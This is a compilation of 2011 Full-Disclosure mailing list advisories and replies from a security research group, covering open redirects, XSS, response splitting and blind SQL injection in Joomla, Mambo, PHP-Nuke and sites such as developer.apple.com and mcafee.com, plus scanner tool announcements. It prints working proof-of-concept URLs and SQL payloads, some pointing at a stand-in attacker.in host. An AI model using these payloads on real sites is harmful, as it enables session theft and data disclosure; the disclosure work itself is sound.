=== MyST BlogSite | Multiple Vulnerabilities === 1. VULNERABILITY DESCRIPTION -- Issue Title: Arbitrary URL Redirect Component: MyST BlogSite ClickDirector Ref: OWASP - Top 10 - 2010 - A10 Ref-Link: https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards Proof-Of-Concept: http://blogsite.com/public/click/~sites/attacker.in/malware_exists_in_this_page/ http://blog.cenzic.com/public/click/~sites/attacker.in/malware_exists_in_this_page/ [FIXED] -- Issue Title: Information Leakage Ref: WASC-13 Ref-Link: http://projects.webappsec.org/w/page/13246936/Information-Leakage This could be used to brute force (http://blogsite.com/login) Proof-Of-Concept: http://blogsite.com/public/mostl/1 http://blogsite.com/public/mostl/2 http://blogsite.com/public/my-account/1 http://blogsite.com/public/my-account/2 http://blogsite.com/public/object/1 http://blogsite.com/public/object/2 http://blogsite.com/public/object/3 -- Issue Title: Arbitrary Text Insertion This could be used to deliver defamatory message to unaware users. Proof-of-Concept: http://blogsite.com/public/mostl-action/1?action=Browsetext=This%20blog%20was%200wned! 2. VENDOR MyST Technology Partners, Inc. http://myst-technology.com/ 4. DISCLOSURE TIME-LINE 2011-04-17: reported vendor 2011-07-16: vulnerability found unfixed 2011-07-16: vulnerability disclosed 5. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[MyST_BlogSite]_vulnerabilities_2011-07 #yehg [2011-07-16] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in developer.apple.com
Vulnerabilities via URL Redirector in developer.apple.com 1. VULNERABILITY DESCRIPTION Arbitrary URL Redirect == POC (Browsers: All) https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page Issue References: OWASP Top 10 A10 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 601 - http://cwe.mitre.org/data/definitions/601.html Cross Site Scripting(XSS) Via Arbitrary URL Redirect POC (Browsers: Safari, Opera): https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D Issue References: OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 79 - http://cwe.mitre.org/data/definitions/79.html HTTP Response Splitting(HRS) Via Arbitrary URL Redirect https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!-- Issue References: CWE 113 - http://cwe.mitre.org/data/definitions/113.html Demo: http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/ 2. VENDOR Apple Inc http://www.apple.com 3. VULNERABILITY STATUS FIXED 4. DISCLOSURE TIME-LINE 2011-04-25: reported vendor 2011-04-27: vendor replied Thank you for forwarding this issue to us. We take any report of a potential security issue very seriously. 2011-06-29: vendor replied vulnerability was fixed 2011-07-01: vulnerability was disclosed 5. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs #yehg [2011-07-01] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] smallftpd = 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability
smallftpd = 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability 1. OVERVIEW The smallftpd FTP server is found to be vulnerable to denial of service in handling multiple connection requests regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or reject new FTP login requests. 2. BACKGROUND The smallftpd FTP server isis a small and simple muli-threaded ftp server for windows. 3. VERSIONS AFFECTED 1.0.3-fix and earlier 4. PROOF-OF-CONCEPT/EXPLOIT http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb http://www.exploit-db.com/download/17455 5. SOLUTION The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place. 6. VENDOR Arnaud Mary 7. CREDIT This vulnerability was discovered by Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos SmallFTPD Home Page: http://smallftpd.sourceforge.net/ SmallFTPD Download Stat: http://sourceforge.net/project/stats/?group_id=104723ugn=smallftpdtype=mode=alltime ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities 1. OVERVIEW Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (QueryString, option, searchword) in Joomla! Core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSION AFFECTED 1.6.3 and lower 5. PROOF-OF-CONCEPT/EXPLOIT component: com_contact , parameter: QueryString (Browser: All) === http://attacker.in/joomla163_noseo/index.php?option=com_contactview=categorycatid=26id=36Itemid=-1;scriptalert(/XSS/)/script component:com_content , parameter: QueryString (Browser: All) === http://attacker.in/joomla163_noseo/index.php?option=com_contentview=categoryid=19Itemid=260limit=10filter_order_Dir=limitstart=filter_order=scriptalert(/XSS/)/script component: com_newsfeeds , parameter: QueryString (Browser: All) = http://attacker.in/joomla163_noseo/index.php?option=com_newsfeedsview=categoryid=17whateverehere=;scriptalert(/XSS/)/scriptItemid=253limit=10filter_order_Dir=ASCfilter_order=ordering parameter: option (Browser: All) http://attacker.in/joomla163_noseo/index.php?option=;scriptalert(/XSS/)/scripttask=reset.request component: com_search, parameter: searchword (Browser: IE, Konqueror) = [REQUEST] POST /joomla163/index.php HTTP/1.1 Referer: http://attacker.in/joomla163/ User-Agent: Konqueror/4.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: attacker.in Accept-Encoding: gzip, deflate Content-Length: 125 option=com_searchsearchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253Etask=search [/REQUEST] This searchword XSS was identified via source code: http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg 6. IMPACT Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. 7. SOLUTION Upgrade to Joomla! 1.6.4 or higher 8. VENDOR Joomla! Developer Team http://www.joomla.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-05-26: notified vendor 2011-06-28: vendor released fix 2011-06-28: vulnerability disclosed 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS) Vendor Advisory URL: http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html XSS FAQ: http://www.cgisecurity.com/xss-faq.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-06-28] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's power in
simplicity also makes it the CMS of choice for many small businesses
and personal sites.
3. VULNERABILITY DESCRIPTION
Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.
4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)
5. PROOF-OF-CONCEPT/EXPLOIT
FrontEnd
==
param: task
http://attacker.in/mambo/index.php?option=com_contenttask=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20id=3Itemid=32
BackEnd
==
param: menu
http://attacker.in/mambo/administrator/index2.php?option=com_menumanagertask=edithidemainmenu=1menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20
param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox]
http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20style%3dx%3aexpression(alert(/XSS/))%20X
http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20X
param: zorder
http://attacker.in/mambo/administrator/index2.php?limit=10order%5b%5d=11boxchecked=0toggle=onsearch=simple_searchtask=limitstart=0cid%5b%5d=onzorder=c.ordering+DESC;scriptalert(/XSS/)/scriptfilter_authorid=62hidemainmenu=0option=com_typedcontent
param: search
http://attacker.in/mambo/administrator/index2.php?limit=10boxchecked=0toggle=onsearch=xss;scriptalert(/XSS/)/scripttask=limitstart=0hidemainmenu=0option=com_comment
param: client
http://attacker.in/mambo/administrator/index2.php?option=com_modulesclient=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on banner link
param: section [hidden form xss, esp in IE 6,7 and older versions of Firefox]
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3dx%3aexpression(alert(/XSS/))%20Xtask=editAhidemainmenu=1id=2
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20Xtask=editAhidemainmenu=1id=2
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2
6. SOLUTION
The vendor seems to discontinue the development. It is recommended to
use another CMS in active development.
7. VENDOR
Mambo CMS Development Team
http://mambo-developer.org
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip
#yehg [2011-06-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
Did you really test a code base that is a version of an old Joomla base No or did you look at the code, and test old Joomla bugs against it? No The XSS results are from purely blackbox scan on Mambo 4.6.5. Joomla (Joomla! 1.0.0) was released on September 16, 2005. It was a re-branded release of Mambo 4.5.2.3 which, itself, was combined with other bug and moderate-level security fixes. From that statement, it can be assumed that the code bases of Mambo 4.5.2.4 and higher are different from those of Joomla! 1.1 and higher. As you can say so, we may sync old Joomla! 1.x bugs in Mambo 4.6.x. But it may be time-consuming to analyze the code changes and validity of bugs in each version of both CMS. https://secure.wikimedia.org/wikipedia/en/wiki/Joomla http://www.joomla.org/announcements/general-news/154-introducing-joomla-10.html I thought these were found in Joomla ages ago? No. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] java.com | Arbitrary URL Redirect Vulnerability
== java.com | Arbitrary URL Redirect Vulnerability == 1. VULNERABILITY DESCRIPTION - Arbitrary URL Redirect http://java.com/inc/BrowserRedirect1.jsp?locale=enhost=attacker.in Demo: http://yehg.net/lab/pr0js/training/view/misc/java.com_Arbitrary_URL_Redirect/ 2. VENDOR Oracle Inc http://www.oracle.com 3. VULNERABILITY STATUS FIXED 4. DISCLOSURE TIME-LINE 2011-04-19: reported vendor 2011-04-23: vendor fixed the issue 2011-04-24: vulnerability disclosed 5. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/sites/java.com/[java.com]_url_redirection OWASP-Top-10_2010-A10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project SANS-TOP-23: http://www.sans.org/top25-software-errors/ CWE-601: http://cwe.mitre.org/data/definitions/601.html #yehg [2011-04-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor - Ellen Messmer. Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Thanks for all your inputs and discussions. We believe keeping these information as secret is unethical and irresponsible. For those who think/criticize we're unethical /illegal, there is so-called Passive Scanning technique in security testing. Passive scanning (a.k.a Passive Reconnaissance) is basically examining web site work flows and its involved source codes for identifying vulnerabilities without ever attacking the target itself. Contrary to what most of people think, passive scanning allows everyone to audit any web sites without breaking the laws and without alarming firewalls in-front. Basically it starts as: 1. Do Google Hacking and look for potential information leakage. (Most of the tools allow you to add your own GH Dorks). 2. Browse the target web site with a scanner that has passive vulnerability scanning capability - ratproxy, zaproxy, webscarab, fiddler+watcher,/ burp-pro or you name it Also use meta data extraction tools. And look for potential information leakage others 3. Examine all contents of JavaScript decompiled Flash/Silverlight/Java Applet 4. Look for common vulnerable points and mis-uses e.g., for JS files, examine calls like document.URLUnencoded, document.referer, document.location, window.location, location.href,document.URL ...etc Passive scan is just a small subset of assessment realm. Findings are very limited. Our recent disclosure of Plesk open redirect flaw was a result from purely passive scan on a static HTML web site - http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in *McAfee.com
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Tool Update Announcement WhatWeb v0.4.6 Released. Now with over 900 plugins!
Version 0.4.6 of WhatWeb is now released. Enjoy scanning the web. .$$$ $. .$$$ $. $$. .$$$ $$$ .$$. .$$. $$. .$$$. .$$. $ $$ $$$ $ $$ $$$ $ $$. $ $$ $ $$ $$$ $ $$ $$ $ $$. $ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$' $. $ $$$ $. $$ $. $$ `$ $. $ :' $. $ $$$ $. $. $. $::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$ $ $$$ $$$ $$ $ $ $' Readme for WhatWeb - Next generation web scanner. By urbanadventurer aka Andrew Horton from Security-Assessment.com Version: 0.4.6. March 25th, 2011 License: GPLv2 This product is subject to the terms detailed in the license agreement. For more information about WhatWeb visit: Homepage: http://www.morningstarsecurity.com/research/whatweb Wiki: https://github.com/urbanadventurer/WhatWeb/wiki/ If you have any questions, comments or concerns regarding WhatWeb, please consult the documentation prior to contacting one of the developers. Your feedback is always welcome. Contents 1. About WhatWeb 2. Example Usage 3. Usage 4. Logging Output 5. Plugins 6. Aggression 7. Recursive Spidering 8. Performance Stability 9. Optional Dependencies 10. Release History 11. Credits 12. Updates Additional Information 1. About WhatWeb WhatWeb identifies websites. It's goal is to answer the question, What is that Website?. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account ID's, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called 'passive', is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for in penetration tests. Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. 'meta name=generator content=WordPress 2.6.5', but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for /wp-content/ within relative links. Features: * Over 900 plugins * Control the trade off between speed/stealth and reliability * Plugins include example URLs * Performance tuning. Control how many websites to scan concurrently. * Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB. * Recursive web spidering * Proxy support including TOR * Custom HTTP headers * Basic HTTP authentication * Control over webpage redirection * Nmap-style IP ranges * Fuzzy matching * Result certainty awareness * Custom plugins defined on the command line 2. Example Usage Using WhatWeb on a handful of websites (standard WhatWeb output is in colour): $ ./whatweb slashdot.org reddit.com http://reddit.com [302] HTTPServer[AkamaiGHost], RedirectLocation[http://www.reddit.com/], Via-Proxy[1.1 bc1], IP[173.223.232.64], Akamai-Global-Host, Country[UNITED STATES][US] http://slashdot.org [200] Script, HTTPServer[Unix][Apache/1.3.42 (Unix) mod_perl/1.31], Google-Analytics[GA][32013], Via-Proxy[1.1 bc5], UncommonHeaders[x-fry,x-varnish,x-xrds-location,slash_log_data], Apache[1.3.42][mod_perl/1.31], HTML5, IP[216.34.181.45],
[Full-disclosure] [Tool Update Announcement] inspathx
Tool Home: http://code.google.com/p/inspathx/ CHANGELOG = Stat: path definitions - 342 , path vuln definitions - 140 == Added --xp as alias --x-p == Refined param array that supports any number of dimensions with -p option (i.e -p 1, -p 2, -p 3) - Thanks to Brendan Coles http://code.google.com/p/inspathx/wiki/OPTION_Param_Array == Added dotnet 1.x ASPX Full Path Disclosure (tilde character /~.aspx) - Thanks to Ryan Dewhurst http://code.google.com/p/inspathx/wiki/ASPNET_FULL_PATH_DISCLOSURE_DOTNET1X - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP-Nuke 8.x = chng_uid Blind SQL Injection Vulnerability
PHP-Nuke 8.x = Blind SQL Injection Vulnerability 1. OVERVIEW The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection. 2. BACKGROUND PHP-Nuke is a Web Portal System or content management system. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referrers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. 3. VULNERABILITY DESCRIPTION The chng_uid parameter is not properly sanitized upon submission to the /admin.php which leads to Blind SQL Injection vulnerability. This allows an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED 8.0 and lower Tested version: 8.0 The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well. 5. PROOF-OF-CONCEPT/EXPLOIT = /admin.php POST /admin.php HTTP/1.1 Referer: http://localhost/admin.php?op=mod_users Content-Type: application/x-www-form-urlencoded Host: localhost chng_uid=[BLIND_SQL_INJECTION]+op=modifyUser Tested Payloads: ' or 1=1-- [TRUE] ' or 1=2-- [FALSE] ' or substring(@@version,1,1)=5-- [TRUE if mySQL version is 5.x] ' or substring(@@version,1,1)=4-- [FALSE if mySQL version is 5.x] ' or SLEEP(15)=0-- [sleep for 15 seconds] Successful response (True) returns the user update form page. 6. SOLUTION Lock down access to php-Nuke administration backend. No patch is available yet. Use of this product is NOT recommended because of long lack of update and vendor negligence about security reports. 7. VENDOR php-Nuke Developers http://phpnuke.org/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-01: contacted author through emails 2011-01-25: contacted author through web site contact form 2010-03-23: no replies from author 2010-03-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke PHP-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloadsd_op=getitlid=658 CWE-89: http://cwe.mitre.org/data/definitions/89.html #yehg [2010-03-23] keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql injection - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: 